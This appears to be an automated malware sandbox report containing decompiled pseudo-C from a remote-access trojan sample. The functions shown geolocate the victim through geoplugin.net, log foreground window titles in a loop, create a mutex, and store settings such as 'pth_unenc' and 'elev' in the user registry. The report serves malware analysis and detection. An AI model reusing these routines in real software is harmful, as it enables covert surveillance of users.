                    			E00419EDB(void* __ecx, void* __edx) {
                    				WCHAR* _v36;
                    				long _v80;
                    				char _v88;
                    				int _v92;
                    				intOrPtr _v96;
                    				void* _v100;
                    				int _v104;
                    				intOrPtr _v108;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t12;
                    				void* _t13;
                    				void* _t14;
                    				int _t16;
                    				void* _t24;
                    				intOrPtr _t27;
                    				void* _t32;
                    				void* _t33;
                    				void* _t35;
                    				void* _t37;
                    
                    				_t32 = __edx;
                    				_t25 = __ecx;
                    				_t24 = __ecx;
                    				E004020BF(__ecx, __ecx);
                    				_push(0xffff);
                    				_v36 = 0;
                    				_t12 = E0043A620(_t25); // executed
                    				_t33 = _t12; // executed
                    				_t13 = InternetOpenW(0, 1, 0, 0, 0); // executed
                    				_t37 = _t13;
                    				_t14 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0); // executed
                    				_t35 = _t14;
                    				do {
                    					_v80 = _v80 & 0x00000000;
                    					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80); // executed
                    					_t27 = _v96;
                    					_v92 = _t16;
                    					_t40 = _t27;
                    					if(_t27 != 0) {
                    						L00403356(E00402097(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
                    						E00401FB8();
                    						_t27 = _v108;
                    						_t16 = _v104;
                    					}
                    				} while (_t16 == 1 && _t27 != 0);
                    				InternetCloseHandle(_t35);
                    				InternetCloseHandle(_t37);
                    				L0043A61B(_t33); // executed
                    				return _t24;
                    			}
























                    APIs
                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419F02
                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00419F18
                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00419F31
                    • InternetCloseHandle.WININET(00000000), ref: 00419F77
                    • InternetCloseHandle.WININET(00000000), ref: 00419F7A
                    Strings
                    • http://geoplugin.net/json.gp, xrefs: 00419F12
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead
                    • String ID: http://geoplugin.net/json.gp
                    • API String ID: 3121278467-91888290
                    • Opcode ID: 52e2a2ac24d6a613dbec00c9a6df390d54a01e79d0913aa62208e80b44f72806
                    • Instruction ID: a70ecc99465d7097496f885b09ad11ab3779813296453655fb12c4e4d745da0f
                    • Opcode Fuzzy Hash: 52e2a2ac24d6a613dbec00c9a6df390d54a01e79d0913aa62208e80b44f72806
                    • Instruction Fuzzy Hash: FD11C8311093127BD224AB169C49DBF7F9CEF86765F00043EF945E2291DB68DC45C6BA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 94%
                    			E00404CA3(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
                    				char _v24;
                    				char _v28;
                    				char _v40;
                    				void* _v44;
                    				char _v48;
                    				signed int _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v64;
                    				intOrPtr _v68;
                    				char _v76;
                    				char _v80;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t35;
                    				void* _t61;
                    				void* _t65;
                    				struct _SECURITY_ATTRIBUTES* _t67;
                    				signed int _t73;
                    				void* _t90;
                    				_Unknown_base(*)()* _t92;
                    				void* _t94;
                    				void* _t96;
                    				void* _t97;
                    				void* _t98;
                    
                    				_t90 = __edx;
                    				_t97 =  &_v56;
                    				_v52 = _v52 & 0x00000000;
                    				_t94 = __ecx;
                    				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
                    				E004020BF(_t65,  &_v48);
                    				_t7 = _t94 + 0x58; // 0x472f38
                    				_t35 = _t7;
                    				_t92 = _a4;
                    				while(E00404EDB(_t94, E00401F8B(_t92),  &_v52, _t35) != 0) {
                    					_t73 =  *(_t94 + 0x30) & 0x000000ff;
                    					_a12 = _t73;
                    					_t96 = _v52 + _t73;
                    					if(_t96 <= E0040245C()) {
                    						_t67 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t67 = 1;
                    						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040245C();
                    					}
                    					if(_t67 == 0) {
                    						E00401FC2( &_v60, _t90, _t94, E00404182(_t92,  &_v24, _a12, 0xffffffff));
                    						E00401FB8();
                    						E00401FC2( &_v76, _t90, _t94, E00404182( &_v64,  &_v40, 0, _v68));
                    						E00401FB8();
                    						_t103 = _t67;
                    						if(_t67 != 0) {
                    							_t25 = _t94 + 0xc; // 0x472eec
                    							E00401FA0(_t25,  &_v80);
                    							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
                    							__eflags = 0;
                    							CreateThread(0, 0, _a4, _t94, 0, 0); // executed
                    							WaitForSingleObject( *(_t94 + 0x24), 0xffffffff);
                    							FindCloseChangeNotification( *(_t94 + 0x24)); // executed
                    						} else {
                    							_t98 = _t97 - 0x18;
                    							E004020D6(_t67, _t98, _t90, _t103,  &_v80);
                    							_a4(_t94);
                    							_t97 = _t98 + 0x1c;
                    						}
                    						E00401FC2(_t92, _t90, _t94, E00404182(_t92,  &_v28, _t96, 0xffffffff));
                    						E00401FB8();
                    						_t61 = E0040245C();
                    						_t32 = _t94 + 0x58; // 0x472f38
                    						_t35 = _t32;
                    						if(_t61 != 0) {
                    							continue;
                    						}
                    					}
                    					break;
                    				}
                    				return E00401FB8();
                    			}






























                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00472F38), ref: 00404D93
                    • CreateThread.KERNELBASE ref: 00404DA7
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DBB
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                    • String ID: Cqt
                    • API String ID: 2579639479-953143165
                    • Opcode ID: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                    • Instruction ID: dba95858f974454461b1e2e40e9edd510e178e98119d07c53f81cbb5064a2bb1
                    • Opcode Fuzzy Hash: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                    • Instruction Fuzzy Hash: 524194712083016BC711FB61DD55D6FB7EDAFD4314F400A3EB982A22E2DB3899098666
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1599 412a57-412a6e RegCreateKeyA 1600 412a70-412aa5 call 40245c call 401f8b RegSetValueExA RegCloseKey 1599->1600 1601 412aa7 1599->1601 1603 412aa9-412ab7 call 401fb8 1600->1603 1601->1603
                    C-Code - Quality: 77%
                    			E00412A57(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
                    				void* _v8;
                    				long _t12;
                    				int _t15;
                    				long _t17;
                    				signed int _t19;
                    				signed int _t20;
                    
                    				_push(__ecx);
                    				_push(_t19);
                    				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                    				if(_t12 != 0) {
                    					_t20 = 0;
                    				} else {
                    					_t15 = E0040245C();
                    					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F8B( &_a8), _t15); // executed
                    					RegCloseKey(_v8); // executed
                    					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
                    				}
                    				E00401FB8();
                    				return _t20;
                    			}










                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                    • RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                    • RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                    • Instruction ID: 065d1f4c68480eb08966ef6070b87cad1f8bbd79d217faba3f808efe567dd641
                    • Opcode Fuzzy Hash: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                    • Instruction Fuzzy Hash: 99F0F632140208BFCB00AFA0ED45DEE376CEF04750F104276BD09A61A2D7359E10DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 90%
                    			E00409A7A() {
                    				char _v2004;
                    				char _v2012;
                    				char _v2028;
                    				void* _v2036;
                    				char _v2056;
                    				void* _v2060;
                    				char _v2080;
                    				void* _v2084;
                    				void* _t15;
                    				signed int _t17;
                    				void* _t29;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t57;
                    				void* _t61;
                    				signed int _t62;
                    				signed int _t63;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    				void* _t67;
                    				void* _t68;
                    
                    				_t63 = _t62 & 0xfffffff8;
                    				_t69 = _t63;
                    				_t64 = _t63 - 0x81c;
                    				_push(_t33);
                    				_t59 = _t34;
                    				_t61 = _t34 + 0x60;
                    				while(1) {
                    					E00435760(_t57,  &_v2004, 0, 0x7d0);
                    					_t65 = _t64 + 0xc;
                    					while(1) {
                    						_t15 = E00401F8B(E00401E45(0x473298, _t55, _t61, _t69, 0x2a));
                    						_t66 = _t65 - 0x18;
                    						E0040415E(_t33, _t66, _t55, _t61, _t15);
                    						_t17 = E0041AECA( &_v2012, _t55); // executed
                    						_t65 = _t66 + 0x18;
                    						_t69 = _t17;
                    						if(_t17 != 0) {
                    							break;
                    						}
                    						Sleep(0x1f4); // executed
                    					}
                    					_t55 = E004042DC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040415E(_t33,  &_v2028, _t55, _t61,  &_v2004));
                    					E00401EF3(_t59 + 4, _t20, _t59, E00402FF4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
                    					E00401EE9();
                    					E00401EE9();
                    					E00401EE9();
                    					_t67 = _t65 - 0x18;
                    					E004086D0(_t33, _t67, _t55, __eflags, _t61);
                    					E0040977E(_t59, _t55);
                    					while(1) {
                    						_t29 = E00401F8B(E00401E45(0x473298, _t55, _t61, __eflags, 0x2a));
                    						_t68 = _t67 - 0x18;
                    						E0040415E(_t33, _t68, _t55, _t61, _t29);
                    						_t31 = E0041AECA(0, _t55);
                    						_t64 = _t68 + 0x18;
                    						__eflags = _t31;
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						Sleep(0x64);
                    					}
                    					E0040A64F(_t33, _t59, _t55);
                    				}
                    			}



























                    APIs
                      • Part of subcall function 0041AECA: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                      • Part of subcall function 0041AECA: GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                      • Part of subcall function 0041AECA: GetWindowTextW.USER32 ref: 0041AF0D
                    • Sleep.KERNELBASE(000001F4), ref: 00409AD5
                    • Sleep.KERNEL32(00000064), ref: 00409B70
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: e923d892bc4c43722fe5f07cea3606dc1b25639ecdb9401fba0249c39de61a18
                    • Instruction ID: c75d603df524a244733055fbd34c65f055766319f874fab2ee06841349c314ac
                    • Opcode Fuzzy Hash: e923d892bc4c43722fe5f07cea3606dc1b25639ecdb9401fba0249c39de61a18
                    • Instruction Fuzzy Hash: 9821AE3160420057C608BB76DC179AE76A99F91308F40057FF952771D3EE7DAA09869F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 90%
                    			E0040949A(void* __ebx, void* __edi, void* __eflags, char _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t24;
                    				void* _t25;
                    				void* _t36;
                    				void* _t72;
                    				void* _t75;
                    				void* _t76;
                    				void* _t77;
                    
                    				_t47 = __ebx;
                    				_t77 = _t76 - 0x4c;
                    				 *0x46f9d4 = _a4;
                    				_push(_t72);
                    				E00401F66(__ebx,  &_v28);
                    				_t24 = E0043A3D6(_a12);
                    				_t69 = _a8;
                    				if(_t24 != 0) {
                    					_t25 = E0040CF38( &_v52, _t69, _a12); // executed
                    					E00401EF3(0x4730b8, _t69, 0x4730b8, _t25);
                    					E00401EE9();
                    					_t69 = E004087F0( &_v76, 0x4730b8, _t75, "\\");
                    					E00401EF3( &_v28, _t28, 0x4730b8, E00402FF4(__ebx,  &_v52, _t28, __edi, _t75, __eflags, _a16));
                    					E00401EE9();
                    				} else {
                    					E00401EF3( &_v28, _t69, _t72, E0040CF38( &_v52, _t69, _a16));
                    				}
                    				E00401EE9();
                    				 *0x4730ec =  *0x4730ec & 0x00000000;
                    				 *0x4730e8 = _a20 * 0x3e8;
                    				 *0x47308b = _a24;
                    				_t36 =  *0x46f9d4 - 0x31;
                    				if(_t36 == 0) {
                    					E004086D0(_t47, _t77 - 0x18, _t69, __eflags,  &_v28);
                    					E0040977E(0x473040, _t69);
                    				} else {
                    					_t83 = _t36 == 1;
                    					if(_t36 == 1) {
                    						E004086D0(_t47, _t77 - 0x18, _t69, _t83,  &_v28);
                    						E00409835(0x473040);
                    					}
                    				}
                    				return E00401EE9();
                    			}
















                    APIs
                    • _wcslen.LIBCMT ref: 004094B4
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409806
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409816
                      • Part of subcall function 0040977E: CreateThread.KERNEL32 ref: 00409822
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$_wcslen
                    • String ID: @0G$@0G
                    • API String ID: 1119755333-1610251930
                    • Opcode ID: 055a1be09140d5878e4de41385cde3ef7ff32f363c00fe368b3632d24af4b983
                    • Instruction ID: 8240ad2e3e1aaba782ca1c27cc07c235db1714dcc0b5eaf1d0f18af9b8f17ace
                    • Opcode Fuzzy Hash: 055a1be09140d5878e4de41385cde3ef7ff32f363c00fe368b3632d24af4b983
                    • Instruction Fuzzy Hash: 81216171914149AACB05FFA6EC528EE7B78AE11304F00403FF805721E7DE385A59D7DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C577() {
                    				void* _t4;
                    
                    				_t4 = CreateMutexA(0, 1, E00401F8B(0x473268)); // executed
                    				 *0x470d44 = _t4;
                    				return 0 | GetLastError() != 0x000000b7;
                    			}




                    0x0040c586
                    0x0040c58c
                    0x0040c5a3

                    APIs
                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040E146,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 0040C586
                    • GetLastError.KERNEL32 ref: 0040C591
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: h2G
                    • API String ID: 1925916568-3159213000
                    • Opcode ID: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                    • Instruction ID: e6373a13d656ff6d6707b7a2cb114a9c32d4b8c21df5bc8e6e0dabda27f4a646
                    • Opcode Fuzzy Hash: 4bc70ddb443fc9c159d84246c0f6c07cfd46d333705cf816a3e212b6fca9faca
                    • Instruction Fuzzy Hash: 1CD01270709301DBD7141B74AC5976C35609B44703F0044B9F50BD55D1DB788480951A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0041AECA(intOrPtr __ecx, void* __edx, char _a4) {
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				char _v40;
                    				char _v44;
                    				intOrPtr _v60;
                    				char _v64;
                    				char _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				struct HWND__* _t24;
                    				intOrPtr* _t32;
                    				intOrPtr* _t34;
                    				void* _t42;
                    				signed int _t53;
                    				void* _t77;
                    				struct HWND__* _t79;
                    				signed short _t82;
                    				int _t84;
                    				int _t86;
                    				intOrPtr _t89;
                    				void* _t90;
                    				signed int _t91;
                    				void* _t93;
                    
                    				_t77 = __edx;
                    				_t93 = (_t91 & 0xfffffff8) - 0x3c;
                    				_v60 = __ecx;
                    				_t24 = GetForegroundWindow(); // executed
                    				_t79 = _t24;
                    				_t84 = GetWindowTextLengthW(_t79);
                    				_t53 = 0;
                    				_t97 = _t84;
                    				if(_t84 == 0) {
                    					L6:
                    					E00401EE9();
                    					return _t53;
                    				}
                    				_t86 = _t84 + 1;
                    				E0040AE7E(0,  &_v28, _t77, _t79, _t90, _t86, 0);
                    				GetWindowTextW(_t79, E00401EE4( &_v36), _t86);
                    				_t32 = E004022E5( &_v36,  &_v64);
                    				_t34 = E004022AA( &_v40,  &_v64);
                    				E00409291( &_v64,  *((intOrPtr*)(E004022E5( &_v44,  &_v64))),  *_t34,  *_t32);
                    				_t94 = _t93 - 0xc;
                    				E0040415E(0, _t93 - 0xc, _t77, _t90, ";");
                    				E004086D0(0, _t94 - 0x18, _t77, _t97,  &_a4);
                    				E0041AA44( &_v68, _t77); // executed
                    				_t82 = 0;
                    				_t42 = E004021DA( &_v68);
                    				_t98 = _t42;
                    				if(_t42 == 0) {
                    					L5:
                    					E00406150( &_v40);
                    					E00401EE9();
                    					goto L6;
                    				}
                    				_t88 = 0;
                    				while(E00409114( &_v32, E00401E45( &_v40, _t77, _t90, _t98, _t88), _t53) == 0xffffffff) {
                    					_t82 = _t82 + 1;
                    					_t88 = _t82 & 0x0000ffff;
                    					if((_t82 & 0x0000ffff) < E004021DA( &_v40)) {
                    						continue;
                    					}
                    					goto L5;
                    				}
                    				_t89 = _v60;
                    				__eflags = _t89;
                    				if(_t89 != 0) {
                    					E0043E0D9(_t89, E00401EE4( &_v28));
                    				}
                    				E00406150( &_v40);
                    				E00401EE9();
                    				_t53 = 1;
                    				goto L6;
                    			}





























                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                    • GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                    • GetWindowTextW.USER32 ref: 0041AF0D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Text$ForegroundLength
                    • String ID:
                    • API String ID: 1471897267-0
                    • Opcode ID: 15937a727bc4928d59a9533aeff3f2e16f904e2e8cea49d191c50395206b3a62
                    • Instruction ID: 3e28b6e538d4d9c8fb8f0e503eff1941d55928bfac05a0f95e1812ca3ce68f86
                    • Opcode Fuzzy Hash: 15937a727bc4928d59a9533aeff3f2e16f904e2e8cea49d191c50395206b3a62
                    • Instruction Fuzzy Hash: B83186724152016BC604FB62D9968AFB3E8EE94718F40053FFC42631D2EF389E59C69B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E0041288E(void* __ecx, void* __edx, char* _a4, char* _a8) {
                    				void* _v8;
                    				int _v12;
                    				char _v1036;
                    				void* __ebp;
                    				long _t11;
                    				long _t16;
                    				void* _t19;
                    				void* _t21;
                    				void* _t23;
                    				void* _t26;
                    
                    				_t22 = __edx;
                    				_v12 = 0x400;
                    				_t23 = __ecx;
                    				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
                    				if(_t11 != 0) {
                    					_t21 = _t23;
                    					goto L4;
                    				} else {
                    					_t16 = RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
                    					RegCloseKey(_v8); // executed
                    					_t21 = _t23;
                    					if(_t16 != 0) {
                    						L4:
                    						_push(0x464074);
                    					} else {
                    						_push( &_v1036);
                    					}
                    				}
                    				E00402073(_t19, _t21, _t22, _t26);
                    				return _t23;
                    			}














                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                    • RegCloseKey.KERNELBASE(?), ref: 004128DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                    • Instruction ID: fa08edaff8def4b33d2b8c01463c49d1e7a9fcd5e8e464c1f7b2d0f15f6578c3
                    • Opcode Fuzzy Hash: 828b1612e10127a61cfb506c01d251519174206b74f7c168bb24ef52ea09b40d
                    • Instruction Fuzzy Hash: 0701DB76A00228BBDB205B95DD08DDF7FBDEB44751F004166BF04E2140D6748E55D7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004129E0(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                    				void* _v12;
                    				char _v1040;
                    				long _t14;
                    				long _t17;
                    
                    				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
                    				if(_t14 != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12); // executed
                    				RegCloseKey(_v12); // executed
                    				if(_t17 != 0) {
                    					goto L3;
                    				}
                    				E0040632B( &_v1040, _a16, _a20);
                    				E004063B0( &_v1040, _a8, _a12);
                    				return 1;
                    			}








                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                    • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                    • RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: af865eae7d0f815a5e3d820a062f3159d6a947a14fc4738be47aa37cdfc07ac2
                    • Instruction ID: e757102b5f9edeaa3f49f94b8a259336416bdafea7ca2c6cdfa4676243748901
                    • Opcode Fuzzy Hash: af865eae7d0f815a5e3d820a062f3159d6a947a14fc4738be47aa37cdfc07ac2
                    • Instruction Fuzzy Hash: 87018B31400229BBCF219F91EC04DEB7F68EF05750F004065BE09A2161D63589B5DBE4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00412831(char* __edx, char* _a4, char* _a8) {
                    				void* _v8;
                    				int _v12;
                    				int _v16;
                    				int _t12;
                    				long _t14;
                    				long _t18;
                    				signed int _t19;
                    
                    				_t12 = 4;
                    				_v12 = _t12;
                    				_v16 = _t12;
                    				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                    				if(_t14 != 0) {
                    					return 0;
                    				}
                    				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
                    				_t19 = RegCloseKey(_v8); // executed
                    				return _t19 & 0xffffff00 | _t18 == 0x00000000;
                    			}











                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                    • RegCloseKey.KERNELBASE(?), ref: 0041287A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                    • Instruction ID: 69e43ff86f888a52894dd2156315322568ee34e4473ddb17d5254d30eae93871
                    • Opcode Fuzzy Hash: 512b3eed686be6b2a2b717d5ef0a3d80ed66878d695c99a4db23412f4a9e56d0
                    • Instruction Fuzzy Hash: 38F06D7294020CBFDF109FA0AD05FEEBBBCEB04B11F1041A1FA04E6191D2748A549B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004127E7(void* __ecx, char* __edx, char* _a4) {
                    				void* _v8;
                    				long _t8;
                    				signed int _t9;
                    				long _t10;
                    				signed int _t11;
                    
                    				_t8 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                    				if(_t8 != 0) {
                    					_t9 = 0;
                    				} else {
                    					_t10 = RegQueryValueExA(_v8, _a4, 0, 0, 0, 0); // executed
                    					_t11 = RegCloseKey(_v8); // executed
                    					_t9 = _t11 & 0xffffff00 | _t10 == 0x00000000;
                    				}
                    				return _t9;
                    			}









                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                    • RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                    • Instruction ID: 84763f97e707706bd7246b5a08c576b286280a2d5f648d27a36c848fc85b91b7
                    • Opcode Fuzzy Hash: e324eca442c7ad9a6d0e8b8ac30f941762bccad947d2c0f2533ecc126fcf5853
                    • Instruction Fuzzy Hash: 9CE06531905338BB9B205BA2AD0DDEB7FACDF06BA1B010165BD09A1151D2658E50E6E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00412B5F(void* __ecx, char* __edx, char* _a4, char _a8) {
                    				void* _v8;
                    				long _t9;
                    				long _t12;
                    
                    				_t9 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                    				if(_t9 != 0) {
                    					return 0;
                    				}
                    				_t12 = RegSetValueExA(_v8, _a4, 0, 4,  &_a8, 4); // executed
                    				return RegCloseKey(_v8) & 0xffffff00 | _t12 == 0x00000000;
                    			}







                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00412B6D
                    • RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004,00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000), ref: 00412B88
                    • RegCloseKey.ADVAPI32(00000000,?,?,00406D84,elev,00000001,00415F87,00000001,00000000,00000000,00000000), ref: 00412B93
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID:
